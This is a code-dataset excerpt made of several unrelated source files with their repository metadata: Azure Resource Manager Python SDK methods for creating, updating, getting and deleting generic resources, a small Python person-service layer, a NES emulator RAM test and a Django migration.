        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns GenericResource or
         ClientRawResponse<GenericResource> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation; raw=True so the poller receives the
        # undeserialized initial response (with its polling headers).
        raw_result = self._create_or_update_initial(
            resource_group_name=resource_group_name,
            resource_provider_namespace=resource_provider_namespace,
            parent_resource_path=parent_resource_path,
            resource_type=resource_type,
            resource_name=resource_name,
            parameters=parameters,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            # Final response carries the created/updated resource body.
            deserialized = self._deserialize('GenericResource', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # polling: True -> default ARM polling, False -> fire-and-return,
        # anything else -> caller-supplied polling strategy object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _update_initial(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
    """Send the initial PATCH request that starts a resource update.

    Returns the deserialized GenericResource for a 200 response, or
    ``None`` for a 202 (update accepted, still in progress).
    """
    # Expand the URL template with its path parameters.
    url = self.update.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Serialize the payload and issue the PATCH request.
    body_content = self._serialize.body(parameters, 'GenericResource')
    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def update(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Updates a resource (long-running PATCH operation).

    :param resource_group_name: Name of the resource group (case insensitive).
    :type resource_group_name: str
    :param resource_provider_namespace: Namespace of the resource provider.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type of the resource to update.
    :type resource_type: str
    :param resource_name: The name of the resource to update.
    :type resource_name: str
    :param parameters: Parameters for updating the resource.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: when True the poller returns ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for a custom polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the operation; always request the raw response so the
    # poller can inspect status codes and headers.
    raw_result = self._update_initial(
        resource_group_name=resource_group_name,
        resource_provider_namespace=resource_provider_namespace,
        parent_resource_path=parent_resource_path,
        resource_type=resource_type,
        resource_name=resource_name,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Deserialize the terminal response of the LRO.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            return ClientRawResponse(deserialized, response)
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def get(
        self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
    """Gets a resource.

    :param resource_group_name: Name of the resource group containing the
     resource (case insensitive).
    :type resource_group_name: str
    :param resource_provider_namespace: Namespace of the resource provider.
    :type resource_provider_namespace: str
    :param parent_resource_path: The parent resource identity.
    :type parent_resource_path: str
    :param resource_type: The resource type of the resource.
    :type resource_type: str
    :param resource_name: The name of the resource to get.
    :type resource_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :return: GenericResource or ClientRawResponse if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Expand the URL template with its path parameters.
    url = self.get.metadata['url']
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
        'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
        'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
        'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {
        'Accept': 'application/json',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request.
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def check_existence_by_id(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    """Checks by ID whether a resource exists.

    :param resource_id: Fully qualified ID of the resource, in the format
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :return: bool or ClientRawResponse if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Expand the URL template; the resource ID is used verbatim.
    url = self.check_existence_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers (HEAD request carries no Accept header).
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the HEAD request; 204 means "exists", 404 means "missing".
    request = self._client.head(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [204, 404]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = (response.status_code == 204)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
check_existence_by_id.metadata = {'url': '/{resourceId}'}
def _delete_by_id_initial(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    """Send the initial DELETE request that starts a delete-by-ID LRO."""
    # Expand the URL template; the resource ID is used verbatim.
    url = self.delete_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the DELETE request.
    request = self._client.delete(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 202, 204]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # No body to deserialize; implicitly returns None unless raw output
    # was requested.
    if raw:
        return ClientRawResponse(None, response)
def delete_by_id(
        self, resource_id, custom_headers=None, raw=False, polling=True, **operation_config):
    """Deletes a resource by ID (long-running operation).

    :param resource_id: Fully qualified ID of the resource, in the format
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: when True the poller returns ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for a custom polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the operation; always request the raw response so the
    # poller can inspect status codes and headers.
    raw_result = self._delete_by_id_initial(
        resource_id=resource_id,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Delete produces no body; only surface the raw response on demand.
        if raw:
            return ClientRawResponse(None, response)

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_by_id.metadata = {'url': '/{resourceId}'}
def _create_or_update_by_id_initial(
        self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
    """Send the initial PUT request that starts a create-or-update-by-ID LRO."""
    # Expand the URL template; the resource ID is used verbatim.
    url = self.create_or_update_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Serialize the payload and issue the PUT request.
    body_content = self._serialize.body(parameters, 'GenericResource')
    request = self._client.put(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 201, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    # 200 (updated) and 201 (created) both carry a resource body;
    # 202 (accepted) does not.
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)
    if response.status_code == 201:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def create_or_update_by_id(
        self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Create a resource by ID (long-running operation).

    :param resource_id: Fully qualified ID of the resource, in the format
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param parameters: Create or update resource parameters.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: when True the poller returns ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for a custom polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the operation; always request the raw response so the
    # poller can inspect status codes and headers.
    raw_result = self._create_or_update_by_id_initial(
        resource_id=resource_id,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Deserialize the terminal response of the LRO.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            return ClientRawResponse(deserialized, response)
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update_by_id.metadata = {'url': '/{resourceId}'}
def _update_by_id_initial(
        self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
    """Send the initial PATCH request that starts an update-by-ID LRO."""
    # Expand the URL template; the resource ID is used verbatim.
    url = self.update_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Serialize the payload and issue the PATCH request.
    body_content = self._serialize.body(parameters, 'GenericResource')
    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200, 202]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def update_by_id(
        self, resource_id, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
    """Updates a resource by ID (long-running operation).

    :param resource_id: Fully qualified ID of the resource, in the format
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param parameters: Update resource parameters.
    :type parameters:
     ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: when True the poller returns ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for a custom polling strategy
    :return: An instance of LROPoller that returns GenericResource or
     ClientRawResponse<GenericResource> if raw==True
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the operation; always request the raw response so the
    # poller can inspect status codes and headers.
    raw_result = self._update_by_id_initial(
        resource_id=resource_id,
        parameters=parameters,
        custom_headers=custom_headers,
        raw=True,
        **operation_config
    )

    def get_long_running_output(response):
        # Deserialize the terminal response of the LRO.
        deserialized = self._deserialize('GenericResource', response)
        if raw:
            return ClientRawResponse(deserialized, response)
        return deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_by_id.metadata = {'url': '/{resourceId}'}
def get_by_id(
        self, resource_id, custom_headers=None, raw=False, **operation_config):
    """Gets a resource by ID.

    :param resource_id: Fully qualified ID of the resource, in the format
     /subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
    :type resource_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :return: GenericResource or ClientRawResponse if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Expand the URL template; the resource ID is used verbatim.
    url = self.get_by_id.metadata['url']
    path_format_arguments = {
        'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Query string carries only the service API version.
    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Request headers; optional ones are added conditionally below.
    header_parameters = {
        'Accept': 'application/json',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request.
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('GenericResource', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_by_id.metadata = {'url': '/{resourceId}'}
| [
"zikalino@microsoft.com"
] | zikalino@microsoft.com |
af1f62d0bf863e6597fbe007f00340142d4450ce | 16b2c2365eff11f34ae260321e6dde78ab09b45d | /api/api_services/PersonService.py | 14c5f4056460582f3abd2dd4a7f5dc56475455ed | [] | no_license | laken11/TMS | bf941802e350a16db0f2314330ad315e73ce48f0 | c271f2cbb1624ab943c10bacaa6406ec8ca08083 | refs/heads/dev | 2023-04-27T22:03:38.811267 | 2021-05-08T12:06:54 | 2021-05-08T12:06:54 | 362,518,465 | 0 | 0 | null | 2021-05-05T10:07:54 | 2021-04-28T15:27:28 | Python | UTF-8 | Python | false | false | 1,823 | py | from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
    """Abstract service-layer contract for managing Person objects."""

    @abstractmethod
    def create_person(self, model: CreatePersonDto):
        """Create a person object."""
        raise NotImplementedError

    @abstractmethod
    def update_person(self, person_id, model: UpdatePersonDto):
        """Update a person object."""
        raise NotImplementedError

    @abstractmethod
    def list_person(self) -> List[ListPersonDto]:
        """List all person objects."""
        raise NotImplementedError

    @abstractmethod
    def person_details(self, person_id, model: PersonDetailsDto):
        """Details of a person object."""
        raise NotImplementedError

    @abstractmethod
    def update_person_role(self, person_id, model: UpdatePersonRoleDto):
        """Update a person's role."""
        raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
    """Default service implementation that delegates every operation to a
    :class:`PersonRepository`."""

    # Repository backing this service; all calls are forwarded to it.
    repository: PersonRepository

    def __init__(self, repository: PersonRepository):
        self.repository = repository

    def create_person(self, model: CreatePersonDto):
        """Create a person via the repository."""
        return self.repository.create_person(model=model)

    def update_person(self, person_id, model: UpdatePersonDto):
        """Update a person via the repository.

        BUG FIX: the original called ``self.update_person(...)``, which
        recursed infinitely; it must delegate to the repository instead.
        """
        return self.repository.update_person(person_id=person_id, model=model)

    def list_person(self) -> List[ListPersonDto]:
        """List all persons via the repository."""
        return self.repository.list_person()

    def person_details(self, person_id, model: PersonDetailsDto):
        """Fetch details for one person via the repository."""
        return self.repository.person_details(person_id=person_id, model=model)

    def update_person_role(self, person_id, model: UpdatePersonRoleDto):
        """Update a person's role via the repository."""
        return self.repository.update_person_role(person_id=person_id, model=model)
"omitogunopeyemi@gmail.com"
] | omitogunopeyemi@gmail.com |
4f31d3739a8a0169184bb538944118b6f95aec4a | fd4df5cf34f8427153bf01d25c39ded9315b8d6a | /tests/test_ram.py | 7a12aff7cec9d97af7a57edbc2623b3b2f0b1518 | [
"BSD-2-Clause"
] | permissive | jepebe/nes | 9ac00e89cf474b7811020d18bf7fd8f15b556339 | 79e6ad689473b7a3a4f3b6d7cf2c381220fcf140 | refs/heads/master | 2023-01-05T22:38:30.714836 | 2020-10-26T07:33:10 | 2020-10-26T07:33:10 | 300,615,959 | 1 | 1 | null | 2020-10-26T07:33:11 | 2020-10-02T13:01:36 | Python | UTF-8 | Python | false | false | 567 | py | from nes.bus import Bus
class TestCartridge:
def cpu_write(self, addt, value):
return None
def cpu_read(self, addr):
return None
def test_ram():
    """RAM is writable across the 2 KiB window and mirrored every 0x800."""
    bus = Bus()
    bus.insert_cartridge(TestCartridge())

    # Every address in the base RAM range round-trips a written byte.
    for address in range(0x0000, 0x800):
        bus.cpu_write(address, 0xFF)
        assert bus.cpu_read(address) == 0xFF

    # A single write is visible at the base address and all three mirrors.
    bus.cpu_write(0x700, 0x7F)
    for mirror_index in range(4):
        assert bus.cpu_read(0x700 + 0x800 * mirror_index) == 0x7F
"jepebe@users.noreply.github.com"
] | jepebe@users.noreply.github.com |
e48a0f65f7443f01f4836af97597bfa424e10120 | eb82bd9ed38ccf06cc2c0aafd1a64b9c88063f5f | /mysite/sign/migrations/0002_auto_20180709_1332.py | 278599b58f0e2b085a3944e2a960f8e3a1b5d4dc | [] | no_license | cophoto/pydev | 3ca2e1307f20e37ba79869fcbc5ddecacf52a8d0 | 8b3db7a8f5110a94500f7e50b627408fddc9f80b | refs/heads/master | 2020-03-22T15:57:31.820284 | 2018-07-11T01:41:07 | 2018-07-11T01:41:07 | 140,292,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | # Generated by Django 2.0.7 on 2018-07-09 05:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sign', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='event',
name='limit',
field=models.IntegerField(default=1),
preserve_default=False,
),
migrations.AddField(
model_name='event',
name='status',
field=models.BooleanField(default=True),
preserve_default=False,
),
]
| [
"davidliu.net@gmail.com"
] | davidliu.net@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.